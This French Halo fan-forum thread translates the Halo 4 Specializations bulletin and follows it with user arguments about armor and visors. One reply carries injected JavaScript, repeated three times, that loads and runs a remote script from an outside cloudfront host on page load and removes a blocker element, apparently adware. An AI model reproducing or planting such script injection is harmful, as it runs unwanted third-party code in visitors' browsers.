Halo Bulletin #19 : 15 aout 2012

Page 2 sur 3 Précédent  1, 2, 3  Suivant

Voir le sujet précédent Voir le sujet suivant Aller en bas

Halo Bulletin #19 : 15 aout 2012

Message par Elros le Jeu 16 Aoû 2012 - 16:08

Rappel du premier message :


Comme il avait été annoncé la semaine dernière, les Spécialisations qui seront proposées aux Spartans IV lors de leur carrière dans Halo 4 sont le sujet principal du Bulletin de cette semaine. Si vous souhaitez connaitre tous les détails de cette nouveauté, les lignes qui suivent sont faites pour vous, et elles sont même illustrées par des images des items qui sont débloqués grâce aux spécialisations.



Les Spécialisations d’Halo 4


L’UNSC Infinity, le plus grand vaisseau de la flotte de l’UNSC, est votre passerelle pour le Multijoueur Infinity dans Halo 4 et est au centre de la carrière de votre Spartan. Vous y formerez votre Spartan IV personnalisé et progresserez dans le multijoueur à travers les Spartan Ops et la multitude de modes compétitifs offerts par les War Games.

Halo 4 a cinquante niveaux. Une fois que vous avez atteint le cinquantième niveau, vous aurez le choix de vous engager dans une Spécialisation. Vous pourrez choisir l’ordre dans lequel vous aborderez le déblocage des Spécialisations. Cependant, une fous que vous en avez sélectionné une, vous devrez la compléter entièrement avant de vous engager dans une autre Spécialisation.

Les Spécialisations vous permettent de vous engager dans une voie de grades spécifiques. Ces voies sont composées chacune de dix niveaux. A mesure que vous atteindrez les niveaux de ces voies dédiées, vous débloquerez des ensembles d’armure, des emblèmes, des couleurs de visière, des skins pour armures et armes, et des mods d’armure – qui vous fournissent encore plus d’options pour personnaliser votre Spartan de façon à ce qu’il remplisse le rôle que vous préférez sur le champ de bataille.

Ces mods d’armure fonctionneront exactement comme tous les autres mods tactiques et de soutien du jeu. Ils ne sont pas liés à l’armure spécifique d’une Spécialisation, donc vous n’avez pas à porter l’armure débloquée via une Spécialisation pour utiliser le mod de cette Spécialisation. Ils améliorent une petite de la sandbox (ce qui signifie que les joueurs bons resteront bons, et les joueurs pas bons resteront pas bons), permettant à chacun de jouer selon le style qu’il souhaite et profiter plus souvent des parties de la sandbox qu’il préfère.

Nous considérons les Spécialisations comme du contenu de fin de jeu parce que même si vous avez « accès » à toute la liste le premier jour, vous devrez quand même devoir atteindre le niveau 50 avant de pouvoir vous engager dans n’importe laquelle. Voyez-les comme des outils vous donnant le contrôle sur l’extension de votre montée de niveaux.

Deux Spécialisations – Assassin et Pionnier – seront disponible à tous les joueurs à la sortie du jeu, et les autres seront rendues disponible graduellement dans les mois suivants la sortie du jeu. Nous garderons un œil très pointu sur la progression des joueurs après la sortie du jeu et déploierons les six Spécialisations additionnelles lorsque l’ensemble des joueurs aura atteint certaines étapes importantes. Il y aura aussi des sélections qui n’utiliseront pas les paquetages ou les mods d’armure.

Halo 4 propose les Spécialisations suivantes :

Assassin


Spécialisation Assassin : Optimisation du Spartan pour les opérations d’infiltration qui sont dédiées à l’élimination d’une cible ennemie sans laisser de trace derrière.

Mod d’armure Infiltration : Ce mod d’armure permet à l’utilisateur de se déplacer rapidement et silencieusement au combat, assassinant les ennemis avec dextérité et rapidité.

Le mod d’armure Infiltration - qui présente des formes et des angles très pointus, rappelant un couteau ou une lame – remplit plusieurs rôles aidant un joueur qui aime s’approcher discrètement de ses cibles. Il diminue les bruits émis lors d’un sprint, les animations sont plus rapides (pour diminuer le temps de vulnérabilité), et a un effet mineur sur la Vision Prométhéenne. Typiquement, lorsque la Vision Prométhéenne est activée, les ennemis apparaissent en rouge. Lorsque vous utilisez Infiltration, cependant, seuls vos contours apparaitront en rouge. Souvent, lorsque quelqu’un utilise cette vision, c’est pour scanner rapidement, alors s’il y a beaucoup de monde alentour, il pourrait vous rater. Enfin, vous pouvez l’espérer.



Pionnier


Spécialisation Pionnier : Optimisation du Spartan pour le déploiement en territoire inexploré et hostile (comme les mondes non colonisés ou les constructions Forerunners comme Requiem) dans le but de récolter/relayer des informations.

Mod d’armure Fast Track : Ce mod d’armure permet au Spartan d’acquérir plus de données expérimentales lors de chaque rencontres, ce qui lui permet de monter efficacement en grade plus rapidement.

Le mod d’armure Fast Track se présente sous forme de câblage qui parcourt l’armure pour contrôler les températures dans les conditions extrêmes. Du point du vue du gameplay, il donne au joueur plus d’expérience après chaque partie. Durant une partie, si vous obtenez 10 points par frag, vous n’en aurez pas plus à ce moment précis, mais après la partie, ce mod modifie le total d’expérience que votre Spartan gagne, pour augmenter la vitesse à laquelle vous prenez du niveau. Il n’est pas fait pour tout le monde parce qu’il prend la place d’un élément principal (qui aurait pu vous permettre de porter une grenade de plus ou de sprinter plus longtemps, par exemple). Et, au cas où vous vous le demanderiez, vous ne pouvez pas l’équiper en fin de partie pour avoir plus d’expérience sur l’entièreté de la partie.



Ingénieur


Spécialisation Ingénieur : Optimisation du Spartan pour la subversion, la réparation et la reconstitution d’une large gamme de technologie, y-compris les réseaux complexes Covenants et Forerunners.

Mod d’armure Drop Recon : Ce mode d’armure permet à l’utilisateur de prédire la localisation et l’horaire d’un largage à l’aide d’un système de surveillance sous-orbitaire.

Le mod d’armure Drop Recon – dont le casque présente quatre prises pour connecter des add-ons, selon les besoins – vous informe qu’un largage depuis l’Infinity aura bientôt lieu et de quoi est composé ce largage. Vous voyez le point de largage et le type d’arme avant que l’arme n’arrive (les détails à propos du moment de l’information et du largage sont toujours en train d’être peaufinés). Les équipes organisées trouveront ce mod d’armure utile parce qu’avec une bonne communication, il y a des chances pour que vous battiez tout le monde pour les largages les plus intéressants.



Traqueur


Spécialisation Traqueur : Optimisation du Spartan pour la traque des cibles à longue distance, particulièrement pour les cas où la traque conventionnelle a échoué ou après que la piste suivies aient refroidie.

Mod d’armure Réquisition : Ce mod d’armure octroie à son utilisateur à rappeler ses propres demandes de largage pour qu’il puisse obtenir des armes plus utiles.

Le mod d’armure Réquisition – dont le casque est équipé d’un dispositif de scan sur l’avant de la visière – vous permet de choisir un nouvel ensemble d’armes livrables par largage personnel. Lorsque le menu pour un largage personnel apparait à votre écran, les flèches gauche, droite et basse vous permettent de choisir l’une des options. Quand Réquisition est équipé, appuyer sur la flèche haute changera les trois autres choix. Ce mod d’armure n’a pas connaissance des précédentes options, donc même si rien ne vous garantit d’avoir de meilleurs choix, vous aurez au moins plus de chances d’obtenir une arme ou un bonus qui vous sied, si vous ne l’avez pas eu la première fois.



Roublard


Spécialisation Roublard : Optimisation pour les missions qui requièrent le déploiement d’un seul Spartan pour des durées très longue, plusieurs années si nécessaire.

Mod d’armure Stabilité : Ce mod augmente la stabilité de la visée lorsque l’utilisateur est sous le feu ennemi.

Le mod d’armure Stabilité – qui présente plusieurs éléments fins et pointus – vous fait moins tressaillir lorsque vous zoomez et que l’on vous tire dessus. Il sera utile aux joueurs qui préfèrent les armes de précision et qui sont souvent engagés dans des combats à longue distance. Si deux joueurs armés de DMR et de compétences équivalentes se retrouvent en duel à longue distance, celui qui utilisera Stabilité sera légèrement avantagé.



Rôdeur


Spécialisation Rôdeur : Optimisation pour les missions d’observation de cible qui nécessitent une invisibilité tactique en dépit des opérations à proximité de la cible elle-même.

Mod d’armure Némésis : ce mod marque et suit les ennemis ayant attaqué précédemment l’utilisateur, en les indiquant à l’aide des capteurs passifs de l’armure.

Némésis place un icone sur votre HUD pour marquer la dernière personne qui vous a tué. Alors que certains utiliseront ce mod pour se venger, d’autres l’utiliseront pour éviter cet adversaire (pour des raisons évidentes). Il est aussi utile lorsque vous défendez un objectif, car il vous permet de voir où un attaquant se situe et vers quel point il se dirige. Sur des maps à visibilité réduite, Némésis peut vous fournir de précieuses informations sur les mouvements ennemis, permettant à une équipe de réagir et prendre le dessus.



Eclaireur


Spécialisation Eclaireur : Optimisation pour les déploiements compliqués et non-conventionnels dans un territoire ennemi inconnu et avec peu ou pas d’assistance du commandement.

Mod d’armure Tireur : Ce mod diminue le temps de surchauffe d’une arme montée sur un véhicule, et augmente la vitesse de déplacement du Spartan lorsqu’il porte une tourelle détachée.

Le mod d’armure Tireur – qui a été conçu pour l’exploration de mondes extraterrestres – a deux fonctions principales : Une, lorsque vous êtes aux commandes d’une arme anti infanterie (Warthog et l’arme se secondaires des Apparation, Scorpion, etc …), l’arme surchauffe moins vite, vous permettant de tirer plus longtemps à cadence maximale. Et deux, lorsque vous détachez l’arme d’un emplacement fixe, vous vous déplacez plus vite, vous permettant de l’utiliser plus efficacement en phase d’attaque, plutôt que de vous cantonner à la défense. Vous ne pourrez toujours pas utiliser de capacité d’armure ou de sprinter, mais vous pourrez bouger plus vite, apportant une forte puissance de feu supplémentaire à une attaque.



Opérateur


Spécialisation Opérateur : Optimisation pour le maniement et le contrôle d’une large gamme de véhicule spaciaux, aériens, terrestres et marins.

Mod d’armure Pilote : Ce mod permet au Spartan d’exploiter toute l’endurance et la durabilité du véhicule qu’il conduit.

Ce mod d’armure – qui ajoute des cylindres pouvant contenir un surplus d’oxygen ou de liquide de refroidissement, selon la mission – vous permet de diminuer la durée d’une surcharge au pistolet plasma. Les véhicules que vous conduisez sont aussi plus résistants. Vous pouvez toujours vous faire aborder, mais la fenêtre dont dispose votre adversaire pour effectuer cette action est plus petite.



Certains joueurs sélectionneront leur Spécialisation en se basant sur leur faiblesse, pour réduire leur manque de compétence. D’autres sélectionneront leur Spécialisation selon leur force, dans l’espoir de gagner plus facilement les parties serrées. Quelle que soit la voie que vous choisissez, vous devriez prendre une décision significative pour votre style de jeu, indépendamment des décisions des autres joueurs, parce que comme vous le verrez dans moins de trois mois, tout ceci ne sont que fun et jeux. Jusqu’à ce que vos coéquipiers vous volent votre largage personnel, au moins …

Sur ces mots, mes amis, il est temps de clore cette édition de votre Bulletin Halo. Je vous retrouve la semaine prochaine, pour, si tout va bien, des informations qui émerveilleront vos oreilles …

<3,
bs angel



Dernière édition par Elros le Dim 19 Aoû 2012 - 23:46, édité 1 fois

___________________________
avatar
Elros
Légende
Légende

GamerTag : I Elros I
Team : CRéA
Messages : 1110
Date d'inscription : 05/08/2011
Âge : 29
Réputation : 201
Talent : MIA

Voir le profil de l'utilisateur

Revenir en haut Aller en bas


Re: Halo Bulletin #19 : 15 aout 2012

Message par Pounours le Sam 18 Aoû 2012 - 9:56

Y à rien à faire je trouve ces nouvelles armures absolument horribles. Un mélange des plus douteux entre Crisis et les Power Rangers !
Il s'agit peut être là d'un rendu peu avantageux à la manière des profils Halo Waypoint, mais ça reste vraiment très..... particulier pour ne pas être vulgaire.

___________________________


Mon Chantier

Que la Forge soit avec toi !
avatar
Pounours
Forgeron
Forgeron

GamerTag : Pounours42
Team : ResKP (sympathisant)
Messages : 512
Date d'inscription : 30/08/2011
Âge : 37
Réputation : 33
Talent : Je suis Super Ronchon !
Halo favori : Halo 2
Domaine favori : Maps

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Flexy le Sam 18 Aoû 2012 - 14:11

@Pounours a écrit:Y à rien à faire je trouve ces nouvelles armures absolument horribles. Un mélange des plus douteux entre Crisis et les Power Rangers !
Il s'agit peut être là d'un rendu peu avantageux à la manière des profils Halo Waypoint, mais ça reste vraiment très..... particulier pour ne pas être vulgaire.

Je suis entièrement d'accord avec toi, et puis, où est le réalisme dans ces armures ? Plus de la moitié des armures n'ont pas de visière ! Et elle ne se ressentent pas du tout fonctionnelles !

___________________________
"Preuve est faite que visages dévots et pieuses actions nous servent à enrober de sucre le diable lui-même."

avatar
Flexy
Caporal
Caporal

GamerTag : Flexysme
Messages : 195
Date d'inscription : 03/07/2012
Âge : 20
Réputation : -2
Talent : Vindicatif.
Halo favori : Halo CE
Domaine favori : Strats

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par MrRamaza le Dim 19 Aoû 2012 - 1:03

et puis, où est le réalisme dans ces armures ?
Je sais même pas si tu te rends compte de tes propos mon gars n_n''
Où est le réalisme dans Halo ?

Ah et, si, TOUTES les armures ont des visières.

___________________________
sign by SpartanSniper619
avatar
MrRamaza
Capitaine
Capitaine

GamerTag : MrRamaza
Team : Les Semi-Croustillants
Messages : 518
Date d'inscription : 16/07/2009
Âge : 104
Réputation : 39
Talent : Mettre du beurre dans l'fond du plat pour pas qu'le gratin colle
Halo favori : Halo 2
Domaine favori : Strats

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Stain le Dim 19 Aoû 2012 - 1:19

Contre-exemple: casque Focus. +1 a quiconque me trouve la visière.
avatar
Stain
VIP
VIP

GamerTag : ArseniK Stain (Inactif)
Messages : 3330
Date d'inscription : 14/08/2009
Âge : 22
Réputation : 258
Talent : Blam!
Halo favori : Halo Reach
Domaine favori : Images

Voir le profil de l'utilisateur http://www.youtube.com/user/MrStainProduction

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Road-killer le Dim 19 Aoû 2012 - 3:14

Ca sent pas super bon tout ça...

Franchement j'ai un peu peur de ce a quoi le matchmaking va ressembler :/. Et puis les armures Suspect WTF j'ai envie de dire mais ou sont ils aller chercher ça??? Les couleurs sont flashy les formes sont absolument pas dans l'esprit halo à mon sens c'est vraiment pale .

Et puis des spécialisations je croyais qu'ils voulait retrouver l'esprit et le gameplay H2 et H3... Faux espoir

On verra bien ce qui sortira les 6 septembre .


if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};
avatar
Road-killer
Recrue
Recrue

Messages : 1
Date d'inscription : 23/05/2012
Âge : 22
Réputation : 3
Halo favori : Halo 3

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par FaNAtiiK le Dim 19 Aoû 2012 - 3:26

C'est quoi tout ce texte monstrueux et qui sert à rien? ^^

___________________________

Pseudo LoL : ImSoFaNAtiiK  N'hésitez pas a me contacter pour jouer!
avatar
FaNAtiiK
Modérateur
Modérateur

GamerTag : FF9 I FaNAtiiK
Team : Team TnP
Messages : 2236
Date d'inscription : 26/07/2010
Âge : 20
Réputation : 211
Talent : Metsuryuu Ougi ... Kaï!
Halo favori : Halo Reach
Domaine favori : Tricks & EE

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Flexy le Dim 19 Aoû 2012 - 13:36

@MrRamaza a écrit:
et puis, où est le réalisme dans ces armures ?
Je sais même pas si tu te rends compte de tes propos mon gars n_n''
Où est le réalisme dans Halo ?

Ah et, si, TOUTES les armures ont des visières.

Ça, c'est ce que beaucoup de personnes ne comprennent pas. Je t'explique : Halo, contrairement à Battelfield ou Call off Duty et un jeu futuriste. Mais le Réalisme avec un grand R ne doit pas être compris comme ça quand on parle de jeux vidéos, par exemple, Mario peut-être plus réaliste dans ses mouvement qui sont adaptés au jeu que Street Fighter dont les mouvement du joueur sont complètement absurdes. Halo SE VEUT futuriste et par conséquent il est très réaliste dans sa catégorie de jeux, il répond bien au attentes d'un jeu futuriste et les armures sont (étaient ?) fonctionnelles, ce qui justifie clairement cet univers qu'est Halo. Par exemple, sur Call off Duty, je sais que tu peux lancer des singe explosifs, et ce n'est clairement pas réaliste. Tu comprend ce que je veux dire ou pas ? ^^

Et puis les visières ? Non mais attend mais nos Spartans ne sont pas aveugles sérieux et ce qui ont une visière et bien elle est carrément surréaliste ou trop petite pour qu'on puisse voir à travers.

___________________________
"Preuve est faite que visages dévots et pieuses actions nous servent à enrober de sucre le diable lui-même."

avatar
Flexy
Caporal
Caporal

GamerTag : Flexysme
Messages : 195
Date d'inscription : 03/07/2012
Âge : 20
Réputation : -2
Talent : Vindicatif.
Halo favori : Halo CE
Domaine favori : Strats

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par SK le Dim 19 Aoû 2012 - 14:13

Pas besoin de visière, z'ont des supers capteurs de folie, regarde le casque GUNGNIR dans Reach :D

___________________________


 Chaîne Twitch
avatar
SK
Team CRéA
Team CRéA

GamerTag : I SK80 I
Team : French Wheelmen / CRéA
Messages : 715
Date d'inscription : 06/03/2010
Âge : 24
Réputation : 59
Talent : Keep rhythm
Halo favori : Halo 3
Domaine favori : Vidéos

Voir le profil de l'utilisateur http://www.twitch.tv/isk80i

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par lemon le Dim 19 Aoû 2012 - 14:23

ArseniK a écrit:Contre-exemple: casque Focus. +1 a quiconque me trouve la visière.

ArseniK,


^^

___________________________
Loué soit le Soleil !  [T]/
avatar
lemon
Lieutenant
Lieutenant

GamerTag : Citron Maudit
Messages : 1324
Date d'inscription : 23/06/2011
Âge : 21
Réputation : 75
Talent : Faire un kill en avion tous les 10 ans...
Halo favori : Halo 3
Domaine favori : Images

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Stain le Dim 19 Aoû 2012 - 14:45

Je voulais dire Locus mais je peux pas éditer. ^^
avatar
Stain
VIP
VIP

GamerTag : ArseniK Stain (Inactif)
Messages : 3330
Date d'inscription : 14/08/2009
Âge : 22
Réputation : 258
Talent : Blam!
Halo favori : Halo Reach
Domaine favori : Images

Voir le profil de l'utilisateur http://www.youtube.com/user/MrStainProduction

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Elros le Dim 19 Aoû 2012 - 14:54

lemon the killer a écrit:
ArseniK a écrit:Contre-exemple: casque Focus. +1 a quiconque me trouve la visière.

ArseniK,


^^

C'est l'armure FOTUS, ça ^^

___________________________
avatar
Elros
Légende
Légende

GamerTag : I Elros I
Team : CRéA
Messages : 1110
Date d'inscription : 05/08/2011
Âge : 29
Réputation : 201
Talent : MIA

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Nakira le Dim 19 Aoû 2012 - 15:19

Si si, Locus a une visière, c'est dans le même genre que le Gungir d'Halo Reach : un petit oculaire au milieu du casque.
C'est d'ailleurs le meilleur casque selon moi ^^

___________________________
« Better not give in to it. It takes ten times as long to put yourself together as it does to fall apart. »
An access, and no retch.



Nakira
Brigadier
Brigadier

GamerTag : WST Nakira
Team : WST
Messages : 2756
Date d'inscription : 29/09/2010
Âge : 21
Réputation : 301
Talent : Exister
Halo favori : Halo CE
Domaine favori : FanFictions

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Flexy le Dim 19 Aoû 2012 - 15:29

@SK a écrit:Pas besoin de visière, z'ont des supers capteurs de folie, regarde le casque GUNGNIR dans Reach :D

Non mais sérieux ! Tu t'moques de moi ou quoi ? Bien sûr qu'ils ont besoin d'une visière !

___________________________
"Preuve est faite que visages dévots et pieuses actions nous servent à enrober de sucre le diable lui-même."

avatar
Flexy
Caporal
Caporal

GamerTag : Flexysme
Messages : 195
Date d'inscription : 03/07/2012
Âge : 20
Réputation : -2
Talent : Vindicatif.
Halo favori : Halo CE
Domaine favori : Strats

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Bazou le Dim 19 Aoû 2012 - 15:41

Où est ce que tu vois une visière ici ? ^^
http://d5.e-loader.net/hF80OVYz6A.jpg

Je reprends l'hypothèse de Lunar, il est possible qu'ils possèdent un espèce de dispositif qui leur permettent de pouvoir reconstituer des images vers le cerveau :3
( Je crois que c'est ça qu'il avait dit :33 )

___________________________
Spoiler:




by bendak34
avatar
Bazou
VIP
VIP

GamerTag : BazouL'Assassinxx
Team : Équipe Gaufre Bleue
Messages : 1198
Date d'inscription : 11/06/2009
Âge : 20
Réputation : 79
Halo favori : Halo 3

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Stain le Dim 19 Aoû 2012 - 15:43

Tu la vois mieux [url=halo.xbox.com/blogs/Headlines/image.axd?picture=2012%2f8%2f15%2fpioneer_helmet_gold_001.png]là-dessus[/url] Basil ? ^^
avatar
Stain
VIP
VIP

GamerTag : ArseniK Stain (Inactif)
Messages : 3330
Date d'inscription : 14/08/2009
Âge : 22
Réputation : 258
Talent : Blam!
Halo favori : Halo Reach
Domaine favori : Images

Voir le profil de l'utilisateur http://www.youtube.com/user/MrStainProduction

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Stain le Dim 19 Aoû 2012 - 15:45

Fail oO Essaye ça plutôt ^^
avatar
Stain
VIP
VIP

GamerTag : ArseniK Stain (Inactif)
Messages : 3330
Date d'inscription : 14/08/2009
Âge : 22
Réputation : 258
Talent : Blam!
Halo favori : Halo Reach
Domaine favori : Images

Voir le profil de l'utilisateur http://www.youtube.com/user/MrStainProduction

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Nakira le Dim 19 Aoû 2012 - 15:55

Ah... oui, j'avais pris la bosse au niveau du nez pour un oculaire sur l'image basse qualité. Au temps pour moi Wink

___________________________
« Better not give in to it. It takes ten times as long to put yourself together as it does to fall apart. »
An access, and no retch.



Nakira
Brigadier
Brigadier

GamerTag : WST Nakira
Team : WST
Messages : 2756
Date d'inscription : 29/09/2010
Âge : 21
Réputation : 301
Talent : Exister
Halo favori : Halo CE
Domaine favori : FanFictions

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Dark Malak le Dim 19 Aoû 2012 - 18:08

GHOST RENEGAT a écrit:
@MrRamaza a écrit:
et puis, où est le réalisme dans ces armures ?
Je sais même pas si tu te rends compte de tes propos mon gars n_n''
Où est le réalisme dans Halo ?

Ah et, si, TOUTES les armures ont des visières.

Ça, c'est ce que beaucoup de personnes ne comprennent pas. Je t'explique : Halo, contrairement à Battelfield ou Call off Duty et un jeu futuriste. Mais le Réalisme avec un grand R ne doit pas être compris comme ça quand on parle de jeux vidéos, par exemple, Mario peut-être plus réaliste dans ses mouvement qui sont adaptés au jeu que Street Fighter dont les mouvement du joueur sont complètement absurdes. Halo SE VEUT futuriste et par conséquent il est très réaliste dans sa catégorie de jeux, il répond bien au attentes d'un jeu futuriste et les armures sont (étaient ?) fonctionnelles, ce qui justifie clairement cet univers qu'est Halo. Par exemple, sur Call off Duty, je sais que tu peux lancer des singe explosifs, et ce n'est clairement pas réaliste. Tu comprend ce que je veux dire ou pas ? ^^

Et puis les visières ? Non mais attend mais nos Spartans ne sont pas aveugles sérieux et ce qui ont une visière et bien elle est carrément surréaliste ou trop petite pour qu'on puisse voir à travers.

Tu parles du Futurisme et du Réalisme des jeux vidéos. A mon avis, à la vue des progrès technologiques que connait l'humanité depuis ne serait-ce que 1990, il est à mon avis fort peu probable qu'il sera absolument nécessaire d'avoir une visière en 2550 et des brouettes pour voir quelque chose sur un champs de bataille. Wink

Pierre
avatar
Dark Malak
Légende
Légende

GamerTag : WST Dark Malak
Team : WST
Messages : 4474
Date d'inscription : 17/01/2010
Âge : 20
Réputation : 374
Talent : Contrôle le coté obscur de la Corse !
Halo favori : Halo 3 : ODST
Domaine favori : FanFictions

Voir le profil de l'utilisateur http://whiteskullteam.superforum.fr/

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par lemon le Dim 19 Aoû 2012 - 18:17

Et puis la visière est un point faible aussi : C'est plus fragile donc si elle se casse le visage du spartan est a découvert Wink

Donc peut-être qu'en "2550 et des brouettes" ils ont remplacer la plupart des visières par des petites caméra Wink

___________________________
Loué soit le Soleil !  [T]/
avatar
lemon
Lieutenant
Lieutenant

GamerTag : Citron Maudit
Messages : 1324
Date d'inscription : 23/06/2011
Âge : 21
Réputation : 75
Talent : Faire un kill en avion tous les 10 ans...
Halo favori : Halo 3
Domaine favori : Images

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Nakira le Dim 19 Aoû 2012 - 18:41

Et après tout, on s'en fout des visières.
Ce sont des spartans, ils en ont pas besoin EEaahh
Pour eux la visière est uniquement esthétique, tout comme l'armure en fait, parce qu'ils en ont pas besoin, ils sont invincibles. Parce que ce sont des spartans EEaahh

Et puis au moins, ça permet de vraiment faire un HUD complexe sans avoir à rétro-projecter des images sur une visière en verre totally old school.
It sucks !


D'abord !



PS : Et je pète mon câble si je veux.

___________________________
« Better not give in to it. It takes ten times as long to put yourself together as it does to fall apart. »
An access, and no retch.



Nakira
Brigadier
Brigadier

GamerTag : WST Nakira
Team : WST
Messages : 2756
Date d'inscription : 29/09/2010
Âge : 21
Réputation : 301
Talent : Exister
Halo favori : Halo CE
Domaine favori : FanFictions

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Lunaramethyst le Dim 19 Aoû 2012 - 18:54

Je pensais plutôt à un écran situé à l'intérieur du casque, qui affiche les images captées par les caméras qui filment l'extérieur. Ça ajoute de la complexité, et il peut y avoir des problèmes si une caméra pète, mais on gagne en protection.

Mais 'faut pas se leurrer : toutes les armures qu'on voit ont été conçues sur la seule base de l'esthétique.

___________________________

avatar
Lunaramethyst
Légende
Légende

GamerTag : Solaramethyst
Messages : 4271
Date d'inscription : 25/08/2009
Âge : 23
Réputation : 472
Talent : Archiviste de l'univers Halo
Halo favori : Halo 3
Domaine favori : FanFictions

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Stain le Dim 19 Aoû 2012 - 18:55

Pour moi, la base est bancale. :/
avatar
Stain
VIP
VIP

GamerTag : ArseniK Stain (Inactif)
Messages : 3330
Date d'inscription : 14/08/2009
Âge : 22
Réputation : 258
Talent : Blam!
Halo favori : Halo Reach
Domaine favori : Images

Voir le profil de l'utilisateur http://www.youtube.com/user/MrStainProduction

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

Message par Flexy le Lun 20 Aoû 2012 - 14:16

Non mais c'est une blague ? On, l'humanité n'a pas fait mieux que le système analytique du cerveau par la cornée et à travers l'iris.
Une visiere et absolument nécessaire pour les réflexes et l'agilité car ce sont les yeux qui fournissent les informations nécessaires à la déduction et aux mouvements. Ce sont des Spartans, des soldats sur-entrainés, pas des prototypes de monstre. Et l'histoire des caméras est inutile, car la retransmission image cerveau n'a jamais été plus rapide que par la cornée. Ce serait donc rajouter un laps de temps fatale :

IMAGE -> IRIS -> CERVEAU = PLUS RAPIDE QUE :
IMAGE -> CAMERA ->IRIS -> CERVEAU.

Sachant que la transmission iris - cornée est instantanée.

Et puis devenir aveugle serait complètement absurde pour ce qui pense que la visière ne sert à rien et qu'il suffit des "capteurs".

___________________________
"Preuve est faite que visages dévots et pieuses actions nous servent à enrober de sucre le diable lui-même."

avatar
Flexy
Caporal
Caporal

GamerTag : Flexysme
Messages : 195
Date d'inscription : 03/07/2012
Âge : 20
Réputation : -2
Talent : Vindicatif.
Halo favori : Halo CE
Domaine favori : Strats

Voir le profil de l'utilisateur

Revenir en haut Aller en bas

Re: Halo Bulletin #19 : 15 aout 2012

